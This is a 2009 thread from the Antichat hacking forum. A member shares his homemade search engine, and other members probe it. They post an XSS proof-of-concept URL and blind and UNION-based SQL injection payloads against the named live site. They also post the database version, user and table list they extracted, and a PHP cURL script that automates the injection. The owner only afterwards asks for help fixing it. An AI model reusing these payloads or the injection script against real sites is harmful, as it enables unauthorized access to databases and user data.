Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Сегодня решил помаяться фигней (https://forum.antichat.xyz/showthread.php?t=156939)

Kamik 16.11.2009 11:25
Сегодня решил помаяться фигней
 
Сегодня решил помаяться фигней и поставить свой поисковик с самостоятельной индексацией (не парсер гугла)

Пробуйте, может кому понравится.

http://search.sakh-sun.ru/

Ребята пробуемс и добавляем сайты, Жду положительных отзывов

PS Ссори за рекламу, на самом деле просто хочу поделиться своей работой

Filadmix 16.11.2009 12:32
Ыы... солнечный поиск. Название улыбнуло уже

PHOEN_i_X 16.11.2009 12:33
По поиску форум гомосексуалистов
заголовок не тот выдает )))

Полкан 16.11.2009 12:34
Достойный конкурент Гугла

Filadmix 16.11.2009 12:36
Мм... проверял в опере работу ? Когда жмеш мышкой в поле ввода - сразу выдает "Добавите сайт, введите адрес.... и т.д." Не годится :)

EndLeSSDre@M 16.11.2009 12:55
в гугл хром тоже самое(

d_x 16.11.2009 13:06
Warning: Division by zero in /home/host1000119/sakh-sun.ru/htdocs/search/include/searchfuncs.php on line 602

Warning: preg_match() expects parameter 2 to be string, array given in /home/host1000119/sakh-sun.ru/htdocs/search/search.php on line 56

Fatal error: Unsupported operand types in /home/host1000119/sakh-sun.ru/htdocs/search/include/searchfuncs.php on line 378


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ',,,,,,,,,,,,,,,,,,)' at line 1
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/host1000119/sakh-sun.ru/htdocs/search/include/searchfuncs.php on line 402
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ',,,,,,,,,,,,,,,,,,)' at line 1

http://search.sakh-sun.ru/spider.php?url=%3Cscript%3Ealert%28/xss/%29%3C/script%3E

Там же sql:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''dgdfgdf''' at line 1



Со страницами в UTF-8 конкретные проблемы, иероглифы.
Поисковик на PHP не вытянет хорошую нагрузку.

POS_troi 16.11.2009 13:27
знакомый скрипт (вроде) =)

GrinGoO 16.11.2009 13:43
Usage: php spider.php Options: -all Reindex everything in the database -u Set url to index -f Set indexing depth to full (unlimited depth) -d Set indexing depth to -l Allow spider to leave the initial domain -r Set spider to reindex a site -m Set the string(s) that an url must include (use \n as a delimiter between multiple strings) -n Set the string(s) that an url must not include (use \n as a delimiter between multiple strings)

L I G A 16.11.2009 14:18
d_x
2 column's
5-й мускул
ПС крутить как слепую

Ponchik 16.11.2009 15:25
В опере просит сатй добавить =\

jenyavlg 16.11.2009 15:37
чё то встал он у меня при индексации на 14

Ponchik 16.11.2009 15:46
Пойду хекоть раз sql inj есть
5.1.38-log

Aikaram 16.11.2009 15:50
Magic Searh атаковал!111

Работничег =\

L I G A 16.11.2009 15:54
Цитата:
Сообщение от Ponchik
Пойду хекоть раз sql inj есть
5.1.38-log
брутом?

Ponchik 16.11.2009 15:55
Цитата:
Сообщение от L I G A
брутом?
СИ

L I G A 16.11.2009 16:05
Код:
-' and IF(substring((version()),1,1)=5,1,(select 1 union select 2)) and ''='

Ponchik 16.11.2009 16:06
там больше 15 таблиц >_<

A_n_d_r_e_i 16.11.2009 16:32
Цитата:
Сообщение от Ponchik
В опере просит сатй добавить =\
угу :( +2 ошибки в словах на http://search.sakh-sun.ru/add_site.php

XenkoK 16.11.2009 16:36
Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 2883584 bytes) in /home/host1000119/sakh-sun.ru/htdocs/search/spider.php on line 183

Ponchik 16.11.2009 16:41
VERSION() 5.1.38-log
DATABASE() host1000119_search

Таблы в БД host1000119_search
Цитата:
0 search_categories
1 search_domains
2 search_keywords
3 search_link_keyword0
4 search_link_keyword1
5 search_link_keyword2
6 search_link_keyword3
7 search_link_keyword4
8 search_link_keyword5
9 search_link_keyword6
10 search_link_keyword7
11 search_link_keyword8
12 search_link_keyword9
13 search_link_keyworda
14 search_link_keywordb
15 search_link_keywordc
16 search_link_keywordd
17 search_link_keyworde
18 search_link_keywordf
19 search_links
20 search_keywords
21 search_query_log
22 search_site_category
23 search_sites
24 search_temp
:o Структура прям ппц

USER() host1000119_sear@localhost
Для юзера доступно 2 БД
Цитата:
host1000119_search
information_schema
ппц, а как работат sakh-sun.ru
Знач там другой юзверь :(

aka_zver 16.11.2009 16:44
24 штуки...
Пончик хек ;)

Ponchik 16.11.2009 16:58
Цитата:
Сообщение от l1ght
вот для кого люди стараются ? ;) https://forum.antichat.ru/showpost.php?p=1630322&postcount=13
Там описан метод как найти таблы если пага не меняется, но есть вывод ошибок, и то там брутом :o
А тут пага меняется, при TRUE говорит "присутствует в базе данных" если FALSE - не говорит
http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=1#
http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=2#
Если запрос вернёт "1" скрипт говорит "присутствует в базе данных", просто Union select 1,2 не вернёт, поэтому надо из таблы, и добовляем условие
Хакеры... :rolleyes:

Нате вам гейт для GET Запроса
PHP код:
<?php
$ch curl_init();

curl_setopt($chCURLOPT_URL"http://search.sakh-sun.ru/spider.php");
curl_setopt($chCURLOPT_HEADER1);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS'url=http%3A%2F%2F2q%27+UNION+SELECT+1%2C2+FROM+information_schema.tables+WHERE+1%3D1'.$_GET['c'].'&soption=level&maxlevel=2&in=&out=');

curl_exec($ch);

curl_close($ch);
?>
Можно будет юзать script.php?c=%20AND 1=1%23
Ну я для себя делал потомучо мне быстрее гейт написать, чем настроить тузлу на POST

Filadmix 16.11.2009 17:09
Пончик, а шо это ты сделал ? Я ничего не пойму

Ponchik 16.11.2009 17:11
Цитата:
Сообщение от Filadmix
Пончик, а шо это ты сделал ? Я ничего не пойму
Да хз, я видео скачал и повторял всё как в видео, вон, вроде получилось
Но блин, я захожу на mail.ru пишу в поиск
Цитата:
http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=2#
и ничего неполучается, на icq.com таже телега, чё делать?

Filadmix 16.11.2009 17:17
Цитата:
Цитата:
http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=2#

и ничего неполучается, на icq.com таже телега, чё делать?
Я тоже ввожу и нифига. Пишет что такого документа не найдено, что же делать ? Наверное тут ошипка

LiteMentaL 16.11.2009 19:03
ссори но ху*ня имхо

Chack. 16.11.2009 19:07
Kamik
Флудер
Регистрация: 02.12.2008
Сообщения: 4,294,967,294
Провел на форуме:
3 дня 6 часов 12 минут
Репутация: 2

О_____О
WTF?!

А®ТеS 16.11.2009 19:33
Ponchik, в гугле inj'a нормально пашет, а на майле нет?? Гугл - сакс, юзайте майл!!

LiteMentaL 16.11.2009 19:37
Цитата:
Kamik
Флудер
Регистрация: 02.12.2008
Сообщения: 4,294,967,294
Провел на форуме:
3 дня 6 часов 12 минут

Репутация: 2
чё за херня? о_О WTF?!

Добавлено позже:
Аа всё ясно, эт глюк...

Ponchik 16.11.2009 20:16
Это не глюк, это когда у тебя -1 сообщение тогда оно превращается в 4,294,967,294

aka_zver 16.11.2009 20:17
Цитата:
Сообщение от Ponchik
Это не глюк, это когда у тебя -1 сообщение тогда оно превращается в 4,294,967,294
а как вообще возможно -1 сообщение ? WTF ?

Kamik 17.11.2009 02:33
Ребята, конечно спасибо, но блин...е-мае...

Сейчас в базе: 5415 сайтов, 6316 ссылок, 1 категорий и 148746 ключевых слов.

И нафига все время скулить было. там же только база сайтов. Вся аутентификация хранится в других местах.
Но все равно спасибо...будем делать работу над ошибками)))

VirtuoZ 17.11.2009 03:10
нашол супер-баг: <a href="add_site.php">Добавить свой сайт в поисковую систему</a>

Kamik 17.11.2009 03:33
исправил

Kamik 17.11.2009 06:48
блин...чет никак не могу скуль исправить. может кто поможет

LiteMentaL 17.11.2009 15:48
Цитата:
Это не глюк, это когда у тебя -1 сообщение тогда оно превращается в 4,294,967,294
а как эт сделать?


Время: 23:18